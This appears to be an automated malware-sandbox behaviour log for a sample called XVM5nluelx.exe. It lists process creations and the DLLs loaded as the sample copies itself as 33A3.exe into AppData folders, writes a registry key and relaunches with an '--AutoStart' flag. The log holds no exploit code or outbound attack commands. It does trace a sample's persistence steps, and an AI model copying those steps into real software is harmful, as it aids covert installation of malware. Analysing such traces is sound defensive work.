Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\Desktop\XVM5nluelx.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\XVM5nluelx.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\XVM5nluelx.exe Section loaded: msvcr100.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\dejcbcc Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\dejcbcc Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\dejcbcc Section loaded: msvcr100.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: thumbcache.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: ninput.dll
Source: C:\Windows\explorer.exe Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe Section loaded: slc.dll
Source: C:\Windows\explorer.exe Section loaded: sppc.dll
Source: C:\Windows\explorer.exe Section loaded: profapi.dll
Source: C:\Windows\explorer.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe Section loaded: idstore.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe Section loaded: samcli.dll
Source: C:\Windows\explorer.exe Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe Section loaded: winsta.dll
Source: C:\Windows\explorer.exe Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe Section loaded: devobj.dll
Source: C:\Windows\explorer.exe Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe Section loaded: appextension.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe Section loaded: cdp.dll
Source: C:\Windows\explorer.exe Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe Section loaded: edputil.dll
